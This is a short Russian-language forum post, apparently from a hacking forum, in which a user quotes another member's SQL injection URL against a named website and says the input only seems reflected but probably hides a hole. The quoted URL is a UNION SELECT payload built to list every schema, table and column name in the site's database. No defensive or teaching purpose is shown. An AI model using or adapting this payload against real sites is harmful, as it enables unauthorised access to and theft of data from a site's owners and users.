30.07.2013, 01:49
|
|
Участник форума
Регистрация: 25.05.2013
Сообщений: 249
С нами:
6825206
Репутация:
24
|
|
Сообщение от er9j6@
Так еще можно сделать
http://www.nova-plosha.com/index.php?idd=jobs&jobs=36'+and+1=0+union+select+1 ,2,3,(select(@x)from(select(@x:=0x00),(select(null )from(information_schema.columns)where(table_schem a!=0x696e666f726d6174696f6e5f736368656d61)and(0x00 )in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,tab le_name,0x3a,column_name))))x),5,6,7,8,9,10,11,12, 13,14,15,16+--+
Та я сморю бессмысленно это URL-запрос в код "отражает" и всё..
P.S Но чувствую что там есть "дырочка", квалификации знаний не хватает
|
|
|